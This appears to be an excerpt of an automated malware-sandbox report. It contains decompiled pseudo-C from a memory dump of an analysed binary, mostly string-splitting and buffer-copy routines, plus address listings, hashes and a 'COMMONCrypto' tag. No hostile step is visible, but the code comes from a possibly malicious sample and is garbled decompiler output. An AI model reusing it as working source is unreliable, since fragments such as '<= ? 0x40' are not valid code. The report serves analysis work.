							 *((intOrPtr*)(_t878 + 0x18c)) = E003C9650(_t878 + 0x1f4);
							_t497 = E003C9640( &_v480, 0);
							_push(0);
							_push(0);
							_push(_t497);
							_push(_v340);
							_push( *((intOrPtr*)(_t878 + 0x1a0)));
							E003CE5D0(_v344,  *((intOrPtr*)(_t878 + 0x108)), _t867);
							_push(_t878 + 0xfc);
							E003C9520( &_v320);
							E003C9510( &_v508);
							__eflags = _a8 & 0x000000ff;
							if((_a8 & 0x000000ff) != 0) {
								E003C9850(_t878 + 0x1bc,  &_v684, 0x80);
								E003C9510( &_v692);
							}
							E003C0B10( &_v420);
						}
						_t833 = _t878 + 0x1b4;
						_push(_t878 + 0x1b4);
						E003C9520( *((intOrPtr*)(_t878 + 0x1c4)));
						E003C9510( &_v312);
						_t506 = E003C9660( *((intOrPtr*)(_t878 + 0x1c4)));
						__eflags = _t506;
						if(_t506 != 0) {
							goto L5;
						}
					}
					E003D3260(_t878 + 0x224, _t838, _t867);
					E003C9510(_t878 + 0x1f4);
					E003C9510(_t878 + 0x1e4);
					 *0x3db000 = _t867;
					return _v260;
				}
				L99:
			}

0x003a6ad1
0x003a6ad6
0x003a6ad7
0x003a6ad8
0x003a6ad9
0x003a6adf
0x003a6ae8
0x003a6aec
0x003a6afd
0x003a6b05
0x003a6b07
0x003a6b0c
0x003a6b12
0x003a7967
0x003a7969
0x003a796e
0x003a7972
0x003a7975
0x003a797a
0x003a798b
0x003a797c
0x003a797c
0x003a7980
0x003a7983
0x003a7986
0x003a7986
0x003a7993
0x003a799e
0x003a79a4
0x003a79ad
0x003a79b0
0x003a79b0
0x003a79c0
0x003a79c2
0x003a79c8
0x003a79d1
0x003a79d5
0x003a79d7
0x003a79d7
0x003a79e2
0x003a79f4
0x003a79fb
0x003a7a0b
0x003a7a10
0x003a7a16
0x003a7a23
0x003a7a2a
0x003a7a2f
0x003a7a37
0x003a7a37
0x003a7a3b
0x003a7a40
0x003a7a44
0x003a7a44
0x003a79c2
0x003a6b23
0x003a6b32
0x003a6b40
0x003a6b53
0x003a6b56
0x003a6b5c
0x003a6b61
0x003a6b67
0x003a6b69
0x003a6b6b
0x003a6b70
0x003a6b79
0x003a6b87
0x003a6b9a
0x003a6ba6
0x003a6bbc
0x003a6bd4
0x003a6be5
0x003a6bfa
0x003a6c06
0x003a6c0b
0x003a6c14
0x003a6c1c
0x003a6c30
0x003a6c43
0x003a6c4f
0x003a6c5b
0x003a6c67
0x003a6c78
0x003a6c8d
0x003a6c9d
0x003a6cb6
0x003a6cc2
0x003a6cda
0x003a6cea
0x003a6cf6
0x003a6cfe
0x003a6d05
0x003a6d11
0x003a6d16
0x003a6d1d
0x003a7241
0x003a724f
0x003a726f
0x003a727d
0x003a72a6
0x003a72ab
0x003a72b2
0x003a72b7
0x003a72bb
0x003a72c3
0x003a72c5
0x003a72ca
0x003a72ce
0x003a72ce
0x003a72d0
0x003a72d8
0x003a72e5
0x003a72ec
0x003a72fa
0x003a72ff
0x003a7300
0x003a7302
0x003a7302
0x003a7307
0x003a7307
0x003a7309
0x003a730d
0x003a7311
0x003a7315
0x003a7319
0x003a731d
0x003a731d
0x003a7330
0x003a7341
0x003a734f
0x003a735d
0x003a7362
0x003a736a
0x003a736c
0x003a7370
0x003a7370
0x003a7372
0x003a737f
0x003a7383
0x003a7388
0x003a738a
0x003a739a
0x003a739c
0x003a777d
0x003a7781
0x003a7789
0x003a778e
0x003a779c
0x003a77ae
0x003a77b5
0x003a77c3
0x003a77d3
0x003a77dc
0x003a77e5
0x003a77f1
0x003a77f6
0x003a77f8
0x003a7811
0x003a7815
0x003a781a
0x003a781f
0x003a7821
0x003a7825
0x003a7827
0x003a7832
0x003a7832
0x003a7829
0x003a7829
0x003a782c
0x00000000
0x003a782e
0x003a782e
0x003a782e
0x003a782c
0x003a7837
0x003a7839
0x003a783c
0x003a783c
0x003a7839
0x003a7841
0x00000000
0x003a77fa
0x003a7808
0x003a780d
0x003a780f
0x003a784e
0x003a785b
0x003a786c
0x003a7873
0x003a7881
0x003a7891
0x003a789a
0x003a78a3
0x003a78af
0x003a78b4
0x003a78b6
0x003a78e3
0x003a78e3
0x003a78e8
0x003a78f3
0x003a78fe
0x003a7907
0x003a790c
0x003a7912
0x003a7917
0x003a7919
0x003a7925
0x003a7925
0x003a792e
0x003a7933
0x003a7938
0x003a793a
0x003a793e
0x003a7940
0x003a794b
0x003a794b
0x003a7942
0x003a7942
0x003a7945
0x00000000
0x003a7947
0x003a7947
0x003a7947
0x003a7945
0x003a7950
0x003a7952
0x003a7955
0x003a7955
0x003a7952
0x003a795a
0x00000000
0x00000000
0x00000000
0x00000000
0x003a780f
0x00000000
0x003a77f8
0x003a739c
0x003a73a2
0x003a73a2
0x003a73a3
0x003a73a3
0x003a73ac
0x003a73ac
0x003a73b0
0x003a73b4
0x003a73b8
0x003a7718
0x003a7723
0x003a772f
0x003a773b
0x003a7744
0x003a7749
0x003a774e
0x003a7750
0x003a7754
0x003a7756
0x003a7761
0x003a7761
0x003a7758
0x003a7758
0x003a775b
0x00000000
0x003a775d
0x003a775d
0x003a775d
0x003a775b
0x003a7766
0x003a7768
0x003a776b
0x003a776b
0x003a7768
0x003a7770
0x003a73be
0x003a73c2
0x003a73c9
0x003a73d4
0x003a73d9
0x003a73dc
0x003a73de
0x003a73ee
0x003a7401
0x003a7406
0x003a7406
0x003a7417
0x003a7424
0x003a7430
0x003a743c
0x003a7445
0x003a744a
0x003a744f
0x003a7451
0x003a7455
0x003a7457
0x003a7462
0x003a7462
0x003a7459
0x003a7459
0x003a745c
0x00000000
0x003a745e
0x003a745e
0x003a745e
0x003a745c
0x003a7467
0x003a7469
0x003a746c
0x003a746c
0x003a7469
0x00000000
0x003a744f
0x003a7487
0x003a7490
0x003a74a3
0x003a74b8
0x003a74c4
0x003a74dd
0x003a74e4
0x003a74ee
0x003a750b
0x003a7523
0x003a7544
0x003a754b
0x003a7557
0x003a7560
0x003a756e
0x003a757c
0x003a758a
0x003a758f
0x003a7595
0x003a759c
0x003a75a3
0x003a75aa
0x003a75bb
0x003a75c0
0x003a75c2
0x003a75ca
0x003a75ca
0x003a75cc
0x003a75cf
0x003a75d1
0x003a75d3
0x003a75d6
0x003a75e1
0x003a75fb
0x003a7607
0x003a7607
0x003a7618
0x003a761c
0x003a761f
0x003a761f
0x003a7642
0x003a7657
0x003a765e
0x003a766a
0x003a7687
0x003a769f
0x003a76c0
0x003a76c9
0x003a76d5
0x003a76e1
0x003a76ed
0x003a76f6
0x003a7702
0x003a770e
0x00000000
0x003a75c4
0x003a75c4
0x003a75c5
0x003a75c5
0x00000000
0x003a7471
0x003a7471
0x003a7472
0x003a747a
0x003a747a
0x003a7483
0x00000000
0x003a6d23
0x003a6d23
0x003a6d2f
0x003a6d45
0x003a6d51
0x003a6d62
0x003a6d6a
0x003a6d7b
0x003a6d84
0x003a6d91
0x003a6d9f
0x003a6daf
0x003a6db8
0x003a6db9
0x003a6dba
0x003a6dbb
0x003a6dbc
0x003a6dc1
0x003a6dc5
0x003a6dd1
0x003a6ddf
0x003a6de1
0x003a6ded
0x003a6e05
0x003a6e13
0x003a6e2f
0x003a6e3b
0x003a6e47
0x003a6e53
0x003a6e5f
0x003a6e64
0x003a6e6d
0x003a6e72
0x003a6e7b
0x003a6e80
0x003a6e88
0x003a7177
0x003a717e
0x003a7180
0x003a7183
0x003a7185
0x003a7194
0x003a7194
0x003a7187
0x003a7189
0x003a718c
0x003a718f
0x003a718f
0x003a719d
0x003a719f
0x003a71a6
0x003a71ac
0x003a71af
0x003a71af
0x003a71bf
0x003a71c1
0x003a71c7
0x003a71c7
0x003a71c9
0x003a71d0
0x003a71d0
0x003a71db
0x003a71de
0x003a71ed
0x003a71f4
0x003a7204
0x003a7209
0x003a720f
0x003a721c
0x003a7223
0x003a7228
0x003a7230
0x003a7230
0x003a7234
0x003a7234
0x003a71c1
0x003a6e93
0x003a6e96
0x003a6e9b
0x003a6e9d
0x003a6ea0
0x003a6f30
0x003a6f30
0x003a6f32
0x003a6f33
0x003a6f35
0x003a6f35
0x003a6ead
0x003a6eb4
0x003a6ebf
0x003a6edf
0x003a6ee1
0x003a6ee8
0x003a6eed
0x003a6eed
0x003a6eee
0x003a6efc
0x003a6efe
0x003a6f01
0x003a6f03
0x003a6f1b
0x003a6f20
0x003a6f05
0x003a6f0a
0x003a6f0f
0x003a6f0f
0x003a6f25
0x003a6f2b
0x003a6ef0
0x003a6ef5
0x003a6ef5
0x00000000
0x003a6eee
0x003a6f53
0x003a6f58
0x003a6f5f
0x003a6f67
0x003a6f73
0x003a6f78
0x003a6f80
0x00000000
0x00000000
0x003a6f86
0x003a6f8d
0x003a6f93
0x003a6f95
0x003a6f9b
0x00000000
0x00000000
0x003a6f9b
0x003a6fa1
0x003a6fa5
0x003a6fa7
0x003a6fb0
0x003a6fb2
0x003a6fca
0x003a6fdd
0x003a6fe4
0x003a7062
0x003a7078
0x003a7084
0x003a709c
0x003a709d
0x003a70ae
0x003a70ba
0x003a70cf
0x003a70e2
0x003a70f2
0x003a70f9
0x003a70fa
0x003a70fb
0x003a70fc
0x003a7103
0x003a7118
0x003a7124
0x003a712c
0x003a7138
0x003a7141
0x003a7143
0x003a7167
0x003a7170
0x003a7170
0x003a714c
0x003a714c
0x003a6fe6
0x003a6fed
0x003a6ff1
0x003a6ffd
0x003a7009
0x003a700e
0x003a7010
0x00000000
0x00000000
0x003a7010
0x003a701d
0x003a7029
0x003a7035
0x003a703a
0x003a7053
0x003a7053
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 977e980c727b2a078796923fae3b5949e7870325ed9dfbfafa36197a1bf13719
Instruction ID: 23a5ad6d7b742c110d4eefbca3123fc06ea0ab97b8d10a220d1ccabecb15cca8
Opcode Fuzzy Hash: 977e980c727b2a078796923fae3b5949e7870325ed9dfbfafa36197a1bf13719
Instruction Fuzzy Hash: D4825E30118381DBD736EB20C896FEFB3E5AF95304F51492EB59A8A1A1EF719D04CB52

Uniqueness

Uniqueness Score: -1.00%

Function 003C50A0, Relevance: .8, Instructions: 835
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E003C50A0(signed int* __ecx, signed int* _a4, signed int _a8) {
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _t265;
				intOrPtr* _t266;
				char* _t269;
				unsigned int _t276;
				signed int _t278;
				char* _t279;
				void* _t281;
				signed int _t282;
				intOrPtr* _t283;
				char* _t286;
				unsigned int _t293;
				signed int _t295;
				char* _t296;
				void* _t300;
				signed int _t302;
				unsigned int _t311;
				void* _t315;
				unsigned int _t321;
				signed int _t322;
				signed int _t327;
				signed int _t328;
				char _t332;
				signed int _t333;
				char _t339;
				signed int _t343;
				signed int _t344;
				signed int _t347;
				signed int _t348;
				char _t351;
				char _t354;
				signed int _t355;
				intOrPtr _t358;
				char* _t367;
				signed int _t373;
				signed int _t374;
				char* _t376;
				signed int _t382;
				signed int _t383;
				signed int _t385;
				void* _t386;
				intOrPtr _t387;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				unsigned int _t395;
				signed int _t398;
				signed int _t399;
				char _t400;
				char _t401;
				signed int _t403;
				signed int _t404;
				char _t405;
				char _t406;
				signed int _t407;
				intOrPtr _t413;
				char* _t417;
				char _t418;
				char _t419;
				signed int _t421;
				unsigned int _t427;
				signed int _t429;
				void* _t431;
				char* _t433;
				char _t434;
				char _t435;
				char* _t442;
				char _t445;
				char _t446;
				char _t447;
				signed int _t449;
				signed int _t451;
				signed int _t452;
				char* _t455;
				char _t458;
				char _t459;
				signed int _t460;
				signed int _t464;
				char _t467;
				char _t468;
				char _t469;
				signed int _t471;
				signed int _t473;
				signed int _t474;
				char* _t477;
				char _t480;
				char _t481;
				signed int _t482;
				signed int _t486;
				signed int* _t488;
				char _t493;
				signed int _t496;
				intOrPtr* _t507;
				signed int _t509;
				intOrPtr* _t510;
				unsigned int _t512;
				intOrPtr _t514;
				intOrPtr _t515;
				signed int* _t517;
				void* _t519;
				void* _t521;
				signed int _t523;
				signed int _t525;
				signed int _t526;
				char* _t527;
				char* _t528;
				signed int* _t531;
				unsigned int _t533;
				signed int _t535;
				void* _t537;
				void* _t538;
				void* _t540;
				void* _t542;

				_t537 = (_t535 & 0xfffffff0) - 0x44;
				_t365 = __ecx;
				_t442 = _a8;
				_t517 = _a4;
				if(_t442 == 0 ||  *_t442 == 0) {
					_push(0x10);
					 *_t517 = 1;
					_t265 = E003B1030();
					_push(8);
					_t517[1] = _t265;
					_t517[2] = 4;
					_t266 = E003B1030();
					_t507 = _t266;
					_t538 = _t537 + 8;
					if(_t507 == 0) {
						_t507 = 0;
					} else {
						_t398 =  *_t365;
						 *_t507 = 0;
						 *(_t507 + 4) = 0;
						if(_t398 == 0 ||  *_t398 == 0) {
							_push(0x40);
							_t367 = E003B1030();
							_t538 = _t538 + 4;
							_t269 =  *_t507;
							if(_t269 == 0) {
								 *_t367 = 0;
							} else {
								if(_t367 != 0) {
									_t445 =  *_t269;
									 *_t367 = _t445;
									if(_t445 != 0) {
										_t399 = 0;
										while(1) {
											_t399 = _t399 + 1;
											_t446 =  *((char*)(_t269 + _t399 * 2 - 1));
											 *((char*)(_t367 + _t399 * 2 - 1)) = _t446;
											if(_t446 == 0) {
												break;
											}
											_t447 =  *((char*)(_t269 + _t399 * 2));
											 *((char*)(_t367 + _t399 * 2)) = _t447;
											if(_t447 != 0) {
												continue;
											}
											break;
										}
										_t517 = _a4;
									}
								}
								_push(1);
								_push(_t269);
								E003B10B0();
								_t538 = _t538 + 8;
							}
							 *_t507 = _t367;
							 *(_t507 + 4) = 0x40;
						} else {
							_t449 = _t398 & 0x0000000f;
							if(_t449 == 0) {
								L9:
								asm("pxor xmm0, xmm0");
								_t373 =  ~( ~_t449 + 0x0000000f & 0x0000000f) + 0x7fffffff;
								while(1) {
									asm("movdqu xmm1, [ecx+edx]");
									asm("pcmpeqb xmm1, xmm0");
									asm("pmovmskb eax, xmm1");
									if(_t266 != 0) {
										break;
									}
									_t449 = _t449 + 0x10;
									if(_t449 < _t373) {
										continue;
									} else {
										if(_t373 >= 0x7fffffff) {
											L15:
											_t373 = 0x7fffffff;
										} else {
											while( *((char*)(_t373 + _t398)) != 0) {
												_t373 = _t373 + 1;
												if(_t373 < 0x7fffffff) {
													continue;
												} else {
													goto L15;
												}
												goto L16;
											}
										}
									}
									goto L16;
								}
								asm("bsf ebx, eax");
								_t373 = _t373 + _t449;
							} else {
								_t373 = 0;
								_t449 =  ~_t449 + 0x10;
								while( *((char*)(_t373 + _t398)) != 0) {
									_t373 = _t373 + 1;
									if(_t373 < _t449) {
										continue;
									} else {
										goto L9;
									}
									goto L16;
								}
							}
							L16:
							_t8 = _t373 + 1; // 0x80000000
							_t451 =  <=  ? 0x40 : _t8;
							if(_t451 > 0) {
								_t276 = (_t451 >> 5 >> 0x1a) + _t451 >> 6;
								_v76 = _t276;
								_t452 = _t451 & 0x8000003f;
								if(_t452 < 0) {
									_t452 = (_t452 - 0x00000001 | 0xffffffc0) + 1;
								}
								_t278 = _t276 + (0 | _t452 > 0x00000000) << 6;
								_v76 = _t278;
								_push(_t278);
								_v80 = _t398;
								_t279 = E003B1030();
								_t398 = _v80;
								_t538 = _t538 + 4;
								_t455 =  *_t507;
								_v72 = _t455;
								if(_t455 == 0) {
									 *_t279 = 0;
								} else {
									if(_t279 != 0) {
										_t459 =  *_t455;
										 *_t279 = _t459;
										if(_t459 != 0) {
											_v84 = _t373;
											_t460 = 0;
											_v80 = _t398;
											_t374 = _v72;
											while(1) {
												_t460 = _t460 + 1;
												_t400 =  *((char*)(_t374 + _t460 * 2 - 1));
												 *((char*)(_t279 + _t460 * 2 - 1)) = _t400;
												if(_t400 == 0) {
													break;
												}
												_t401 =  *((char*)(_t374 + _t460 * 2));
												 *((char*)(_t279 + _t460 * 2)) = _t401;
												if(_t401 != 0) {
													continue;
												}
												break;
											}
											_t373 = _v84;
											_t398 = _v80;
											_t517 = _a4;
										}
									}
									_push(1);
									_push(_v72);
									_v84 = _t279;
									_v80 = _t398;
									E003B10B0();
									_t398 = _v80;
									_t279 = _v84;
									_t538 = _t538 + 8;
								}
								 *(_t507 + 4) = _v76;
								 *_t507 = _t279;
							} else {
								_t279 = 0;
							}
							if(_t279 != 0) {
								_t519 = 0;
								while(1) {
									_t458 =  *_t398;
									_t519 = _t519 + 1;
									 *_t279 = _t458;
									if(_t373 != 0 && _t519 == _t373) {
										break;
									}
									if(_t458 == 0) {
										_t517 = _a4;
									} else {
										_t279 = _t279 + 1;
										_t398 = _t398 + 1;
										continue;
									}
									goto L48;
								}
								_t517 = _a4;
								 *((char*)(_t279 + 1)) = 0;
							}
						}
					}
					L48:
					 *(_t517[1]) = _t507;
					return _t517;
				} else {
					_t509 =  *__ecx;
					_t281 = E003C5A90(_t509, _t442);
					_t464 = _a8;
					if(_t281 == 0) {
						_push(0x10);
						 *_t517 = 1;
						_t282 = E003B1030();
						_push(8);
						_t517[1] = _t282;
						_t517[2] = 4;
						_t283 = E003B1030();
						_t510 = _t283;
						_t540 = _t537 + 8;
						if(_t510 == 0) {
							_t510 = 0;
						} else {
							_t403 =  *__ecx;
							 *_t510 = 0;
							 *(_t510 + 4) = 0;
							if(_t403 == 0 ||  *_t403 == 0) {
								_push(0x40);
								_t376 = E003B1030();
								_t540 = _t540 + 4;
								_t286 =  *_t510;
								if(_t286 == 0) {
									 *_t376 = 0;
								} else {
									if(_t376 != 0) {
										_t467 =  *_t286;
										 *_t376 = _t467;
										if(_t467 != 0) {
											_t404 = 0;
											while(1) {
												_t404 = _t404 + 1;
												_t468 =  *((char*)(_t286 + _t404 * 2 - 1));
												 *((char*)(_t376 + _t404 * 2 - 1)) = _t468;
												if(_t468 == 0) {
													break;
												}
												_t469 =  *((char*)(_t286 + _t404 * 2));
												 *((char*)(_t376 + _t404 * 2)) = _t469;
												if(_t469 != 0) {
													continue;
												}
												break;
											}
											_t517 = _a4;
										}
									}
									_push(1);
									_push(_t286);
									E003B10B0();
									_t540 = _t540 + 8;
								}
								 *_t510 = _t376;
								 *(_t510 + 4) = 0x40;
							} else {
								_t471 = _t403 & 0x0000000f;
								if(_t471 == 0) {
									L157:
									asm("pxor xmm0, xmm0");
									_t382 =  ~( ~_t471 + 0x0000000f & 0x0000000f) + 0x7fffffff;
									while(1) {
										asm("movdqu xmm1, [ecx+edx]");
										asm("pcmpeqb xmm1, xmm0");
										asm("pmovmskb eax, xmm1");
										if(_t283 != 0) {
											break;
										}
										_t471 = _t471 + 0x10;
										if(_t471 < _t382) {
											continue;
										} else {
											if(_t382 >= 0x7fffffff) {
												L163:
												_t382 = 0x7fffffff;
											} else {
												while( *((char*)(_t382 + _t403)) != 0) {
													_t382 = _t382 + 1;
													if(_t382 < 0x7fffffff) {
														continue;
													} else {
														goto L163;
													}
													goto L164;
												}
											}
										}
										goto L164;
									}
									asm("bsf ebx, eax");
									_t382 = _t382 + _t471;
								} else {
									_t382 = 0;
									_t471 =  ~_t471 + 0x10;
									while( *((char*)(_t382 + _t403)) != 0) {
										_t382 = _t382 + 1;
										if(_t382 < _t471) {
											continue;
										} else {
											goto L157;
										}
										goto L164;
									}
								}
								L164:
								_t220 = _t382 + 1; // 0x80000000
								_t473 =  <=  ? 0x40 : _t220;
								if(_t473 > 0) {
									_t293 = (_t473 >> 5 >> 0x1a) + _t473 >> 6;
									_v76 = _t293;
									_t474 = _t473 & 0x8000003f;
									if(_t474 < 0) {
										_t474 = (_t474 - 0x00000001 | 0xffffffc0) + 1;
									}
									_t295 = _t293 + (0 | _t474 > 0x00000000) << 6;
									_v76 = _t295;
									_push(_t295);
									_v80 = _t403;
									_t296 = E003B1030();
									_t403 = _v80;
									_t540 = _t540 + 4;
									_t477 =  *_t510;
									_v72 = _t477;
									if(_t477 == 0) {
										 *_t296 = 0;
									} else {
										if(_t296 != 0) {
											_t481 =  *_t477;
											 *_t296 = _t481;
											if(_t481 != 0) {
												_v84 = _t382;
												_t482 = 0;
												_v80 = _t403;
												_t383 = _v72;
												while(1) {
													_t482 = _t482 + 1;
													_t405 =  *((char*)(_t383 + _t482 * 2 - 1));
													 *((char*)(_t296 + _t482 * 2 - 1)) = _t405;
													if(_t405 == 0) {
														break;
													}
													_t406 =  *((char*)(_t383 + _t482 * 2));
													 *((char*)(_t296 + _t482 * 2)) = _t406;
													if(_t406 != 0) {
														continue;
													}
													break;
												}
												_t382 = _v84;
												_t403 = _v80;
												_t517 = _a4;
											}
										}
										_push(1);
										_push(_v72);
										_v84 = _t296;
										_v80 = _t403;
										E003B10B0();
										_t403 = _v80;
										_t296 = _v84;
										_t540 = _t540 + 8;
									}
									 *(_t510 + 4) = _v76;
									 *_t510 = _t296;
								} else {
									_t296 = 0;
								}
								if(_t296 != 0) {
									_t521 = 0;
									while(1) {
										_t480 =  *_t403;
										_t521 = _t521 + 1;
										 *_t296 = _t480;
										if(_t382 != 0 && _t521 == _t382) {
											break;
										}
										if(_t480 == 0) {
											_t517 = _a4;
										} else {
											_t296 = _t296 + 1;
											_t403 = _t403 + 1;
											continue;
										}
										goto L196;
									}
									_t517 = _a4;
									 *((char*)(_t296 + 1)) = 0;
								}
							}
						}
						L196:
						 *(_t517[1]) = _t510;
						return _t517;
					} else {
						_t407 = 0;
						_v56 = 0;
						_v52 = 0;
						_v48 = 0;
						_t385 = _t464 & 0x0000000f;
						if(_t385 == 0) {
							L54:
							asm("pxor xmm0, xmm0");
							_t413 =  ~( ~_t385 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [edx+ebx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb esi, xmm1");
								if(_t517 != 0) {
									break;
								}
								_t385 = _t385 + 0x10;
								if(_t385 < _t413) {
									continue;
								} else {
									if(_t413 >= 0x7fffffff) {
										L60:
										_t413 = 0x7fffffff;
									} else {
										while( *((char*)(_t413 + _t464)) != 0) {
											_t413 = _t413 + 1;
											if(_t413 < 0x7fffffff) {
												continue;
											} else {
												goto L60;
											}
											goto L61;
										}
									}
								}
								goto L61;
							}
							asm("bsf ecx, ecx");
							_t413 = _t517 + _t385;
						} else {
							_t385 =  ~_t385 + 0x10;
							while( *((char*)(_t407 + _t464)) != 0) {
								_t407 = _t407 + 1;
								if(_t407 < _t385) {
									continue;
								} else {
									goto L54;
								}
								goto L61;
							}
							asm("pxor xmm0, xmm0");
						}
						L61:
						_v28 = _t413;
						_t386 = _t281;
						do {
							_t387 = _t386 - _t509;
							if(_t387 == 0 || _t509 == 0 ||  *_t509 == 0) {
								_push(0x40);
								_t523 = E003B1030();
								_t537 = _t537 + 4;
								 *_t523 = 0;
							} else {
								_t58 = _t387 + 1; // 0x1
								_t525 =  <=  ? 0x40 : _t58;
								if(_t525 > 0) {
									_t311 = (_t525 >> 5 >> 0x1a) + _t525 >> 6;
									_t526 = _t525 & 0x8000003f;
									if(_t526 < 0) {
										_t526 = (_t526 - 0x00000001 | 0xffffffc0) + 1;
									}
									_push(_t311 + (0 | _t526 > 0x00000000) << 6);
									_t523 = E003B1030();
									_t537 = _t537 + 4;
									 *_t523 = 0;
									if(_t509 != 0) {
										_t315 = 0;
										while(1) {
											_t315 = _t315 + 1;
											_t493 =  *((char*)(_t315 + _t509 - 1));
											 *((char*)(_t315 + _t523 - 1)) = _t493;
											if(_t315 == _t387) {
												break;
											}
											if(_t493 != 0) {
												continue;
											} else {
											}
											goto L75;
										}
										 *((char*)(_t315 + _t523)) = 0;
									}
								} else {
									_t523 = 0;
								}
							}
							L75:
							_t486 = _v56;
							_t300 =  >  ? _t486 : 0;
							_t301 =  >=  ? _t486 : _t300;
							_v24 =  >=  ? _t486 : _t300;
							_t302 = _v48;
							if(_t486 == _t302) {
								_v48 = _t302 + 4;
								_push(0x10 + _t302 * 4);
								_v60 = E003B1030();
								E003B0C10(_v60, _v52, _v56 << 2);
								_push(4);
								_push(_v52);
								E003B10B0();
								_t537 = _t537 + 0x18;
								_v52 = _v60;
								_t486 = _v56;
							}
							_t487 = _t486 != _v24;
							if(_t486 != _v24) {
								E003B0BC0(_v52 + _v24 * 4 + 4, _v52 + _v24 * 4, _t487 << 2);
								_t537 = _t537 + 0xc;
							}
							_push(8);
							_t488 = E003B1030();
							_t542 = _t537 + 4;
							if(_t488 == 0) {
								_t488 = 0;
							} else {
								 *_t488 = 0;
								_t488[1] = 0;
								if(_t523 == 0 ||  *_t523 == 0) {
									_push(0x40);
									_v64 = _t488;
									_t327 = E003B1030();
									_t488 = _v64;
									_v76 = _t327;
									_t542 = _t542 + 4;
									_t328 =  *_t488;
									_v80 = _t328;
									if(_t328 == 0) {
										 *_v76 = 0;
									} else {
										if(_v76 != 0) {
											_t417 = _v76;
											_t332 =  *_t328;
											 *_t417 = _t332;
											if(_t332 != 0) {
												_v84 = _t523;
												_t333 = 0;
												_v40 = _t387;
												_v44 = _t509;
												_t393 = _v80;
												_t527 = _t417;
												while(1) {
													_t333 = _t333 + 1;
													_t418 =  *((char*)(_t393 + _t333 * 2 - 1));
													 *((char*)(_t527 + _t333 * 2 - 1)) = _t418;
													if(_t418 == 0) {
														break;
													}
													_t419 =  *((char*)(_t393 + _t333 * 2));
													 *((char*)(_t527 + _t333 * 2)) = _t419;
													if(_t419 != 0) {
														continue;
													}
													break;
												}
												_t523 = _v84;
												_t387 = _v40;
												_t509 = _v44;
											}
										}
										_push(1);
										_push(_v80);
										_v64 = _t488;
										E003B10B0();
										_t488 = _v64;
										_t542 = _t542 + 8;
									}
									 *_t488 = _v76;
									_t488[1] = 0x40;
								} else {
									_t421 = _t523 & 0x0000000f;
									if(_t421 == 0) {
										L86:
										asm("pxor xmm1, xmm1");
										_t339 =  ~( ~_t421 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										_v36 = _t339;
										_v44 = _t509;
										_t514 = _t339;
										while(1) {
											asm("movdqu xmm0, [esi+ecx]");
											asm("pcmpeqb xmm0, xmm1");
											asm("pmovmskb eax, xmm0");
											if(_t339 != 0) {
												break;
											}
											_t421 = _t421 + 0x10;
											if(_t421 < _t514) {
												continue;
											} else {
												_v36 = _t514;
												_t509 = _v44;
												if(_v36 >= 0x7fffffff) {
													L93:
													_v36 = 0x7fffffff;
												} else {
													_t358 = _v36;
													while( *((char*)(_t358 + _t523)) != 0) {
														_t358 = _t358 + 1;
														if(_t358 < 0x7fffffff) {
															continue;
														} else {
															goto L93;
														}
														goto L94;
													}
													goto L145;
												}
											}
											goto L94;
										}
										asm("bsf eax, eax");
										_t509 = _v44;
										_v36 = _t339 + _t421;
									} else {
										_v36 = 0;
										_t358 = _v36;
										_t421 =  ~_t421 + 0x10;
										while( *((char*)(_t358 + _t523)) != 0) {
											_t358 = _t358 + 1;
											if(_t358 < _t421) {
												continue;
											} else {
												goto L86;
											}
											goto L94;
										}
										L145:
										_v36 = _t358;
									}
									L94:
									_t343 =  <=  ? 0x40 : _v36 + 1;
									if(_t343 > 0) {
										_t427 = (_t343 >> 5 >> 0x1a) + _t343 >> 6;
										_v72 = _t427;
										_t344 = _t343 & 0x8000003f;
										if(_t344 < 0) {
											_t344 = (_t344 - 0x00000001 | 0xffffffc0) + 1;
										}
										_t429 = _t427 + (0 | _t344 > 0x00000000) << 6;
										_v72 = _t429;
										_push(_t429);
										_v64 = _t488;
										_t347 = E003B1030();
										_t488 = _v64;
										_v32 = _t347;
										_t542 = _t542 + 4;
										_t348 =  *_t488;
										_v68 = _t348;
										if(_t348 == 0) {
											 *_v32 = 0;
										} else {
											if(_v32 != 0) {
												_t354 =  *_t348;
												_t433 = _v32;
												 *_t433 = _t354;
												if(_t354 != 0) {
													_v84 = _t523;
													_t355 = 0;
													_v40 = _t387;
													_v44 = _t509;
													_t395 = _v68;
													_t528 = _t433;
													while(1) {
														_t355 = _t355 + 1;
														_t434 =  *((char*)(_t395 + _t355 * 2 - 1));
														 *((char*)(_t528 + _t355 * 2 - 1)) = _t434;
														if(_t434 == 0) {
															break;
														}
														_t435 =  *((char*)(_t395 + _t355 * 2));
														 *((char*)(_t528 + _t355 * 2)) = _t435;
														if(_t435 != 0) {
															continue;
														}
														break;
													}
													_t523 = _v84;
													_t387 = _v40;
													_t509 = _v44;
												}
											}
											_push(1);
											_push(_v68);
											_v64 = _t488;
											E003B10B0();
											_t488 = _v64;
											_t542 = _t542 + 8;
										}
										_t488[1] = _v72;
										 *_t488 = _v32;
									} else {
										_v32 = 0;
									}
									if(_v32 != 0 && _t523 != 0) {
										_v40 = _t387;
										_t431 = 0;
										_v44 = _t509;
										_t394 = _v32;
										_t515 = _v36;
										while(1) {
											_t431 = _t431 + 1;
											_t351 =  *((char*)(_t431 + _t523 - 1));
											 *((char*)(_t431 + _t394 - 1)) = _t351;
											if(_t515 != 0 && _t431 == _t515) {
												break;
											}
											if(_t351 != 0) {
												continue;
											} else {
												_t387 = _v40;
												_t509 = _v44;
											}
											goto L126;
										}
										_t387 = _v40;
										_t509 = _v44;
										 *((char*)(_t431 + _v32)) = 0;
									}
								}
							}
							L126:
							 *(_v52 + _v24 * 4) = _t488;
							_v56 = _v56 + 1;
							_push(1);
							_push(_t523);
							E003B10B0();
							_t537 = _t542 + 8;
							_t509 = _t509 + _t387 + _v28;
							_t386 = E003C5A90(_t509, _a8);
